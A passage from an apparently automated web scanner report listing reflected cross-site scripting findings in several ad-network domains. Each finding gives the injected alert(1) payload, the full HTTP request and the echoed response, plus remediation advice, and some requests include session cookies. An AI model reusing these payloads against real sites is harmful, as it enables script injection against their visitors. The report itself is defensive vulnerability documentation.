Set-Cookie: MMNATTR=HXtQ0pfNkJ1c4mX6vgZcp8f66noqZiUcvjvHUPvSNUk2F5wUpX4oe5LYJusJZBlGEY8uSSoQdermwgdXfUXtMFyu5OF%2FctPzwqfQNBKlaQD3xlXwKdpPgocglRLh%2F0eOJApuk2TK739B%2Bg50BGHKb62pvu6LDIWnndQzge1bS9RDQC0ANcKCiZ6xJvTCfca0nNNuDCgqEXtG1XxlfrBXx1g8OH8jJWq4g9UOglHpYRsTmtPoMh5NqJ6jWagBNLpYffmM1aVyEtu58KM6xoytbqGNPyplpT9ICVrZh61t7fVltmDDTuSy7u1sWOQwkIZTlgC0PoTN968c2vj%2F0Ct9DlISu2gQIj%2FCITwsOHyj8OHZXIfdNdpsbKNwDNXlyvJF9BdFxDRL%2BvmA; expires=Fri, 02-Mar-2012 02:37:11 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSID=26de56d01ed956f4e7a3da4fd1dea473; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSIDC=56; path=/; domain=.martiniadnetwork.com; httponly
Cache-Control: max-age=15552000
Expires: Fri, 02 Mar 2012 02:37:10 GMT
Vary: Accept-Encoding
Content-Length: 1347
Content-Type: text/html


var OAS_taxonomy = 'muid=21051315103139790868608';
var OAS_pubclick = 'http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/10000051695109bd74';alert(1)//fb3f90f9c4c/loc/http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142%2F';
OAS_pubclick = OAS_pubclick + '/pubclick/' + MMI_ClickURL;
var OAS_searchterms = '';
...[SNIP]...

6.136. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 392cc"-alert(1)-"5afc7ba6df5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai392cc"-alert(1)-"5afc7ba6df5/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:10:25 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:10:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai392cc"-alert(1)-"5afc7ba6df5/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

6.137. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7afbb"-alert(1)-"61bebf5c956 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.php7afbb"-alert(1)-"61bebf5c956?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:11:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:11:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php7afbb"-alert(1)-"61bebf5c956?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

6.138. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 119b2"-alert(1)-"b52d5d9fc25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai119b2"-alert(1)-"b52d5d9fc25/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:11:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:11:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai119b2"-alert(1)-"b52d5d9fc25/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

6.139. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74451"-alert(1)-"fc2592ad76b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.php74451"-alert(1)-"fc2592ad76b?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:12:24 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:12:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php74451"-alert(1)-"fc2592ad76b?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

6.140. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a3fb"-alert(1)-"2568373cb00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai3a3fb"-alert(1)-"2568373cb00/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:09:31 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:09:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai3a3fb"-alert(1)-"2568373cb00/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

6.141. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b87f"-alert(1)-"fa7dbe78fed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.php7b87f"-alert(1)-"fa7dbe78fed?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:10:19 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:10:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php7b87f"-alert(1)-"fa7dbe78fed?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

6.142. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 418f5"-alert(1)-"f7db6642350 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai418f5"-alert(1)-"f7db6642350/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:10:24 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:10:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai418f5"-alert(1)-"f7db6642350/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

6.143. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69437"-alert(1)-"1ec89bcc759 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.php69437"-alert(1)-"1ec89bcc759?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:11:51 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:11:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php69437"-alert(1)-"1ec89bcc759?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

6.144. http://nai.adsonar.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecff2"-alert(1)-"1571936b29c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /naiecff2"-alert(1)-"1571936b29c/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:10:25 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:10:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/naiecff2"-alert(1)-"1571936b29c/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

6.145. http://nai.adsonar.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e7c5"-alert(1)-"f5b54d909b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.php5e7c5"-alert(1)-"f5b54d909b4?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:11:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:11:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php5e7c5"-alert(1)-"f5b54d909b4?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

6.146. http://nai.adtech.de/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c2ca"-alert(1)-"ee03acab181 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai7c2ca"-alert(1)-"ee03acab181/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC156E651A4418BD90FFF0106094

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:10:55 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:10:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

